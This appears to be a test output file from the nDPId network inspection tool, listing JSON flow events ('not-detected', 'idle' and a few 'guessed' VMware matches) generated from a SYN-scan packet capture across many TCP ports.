-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19315,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VMware","breed":"Acceptable","category":"RemoteAccess"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VMware","breed":"Acceptable","category":"RemoteAccess"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 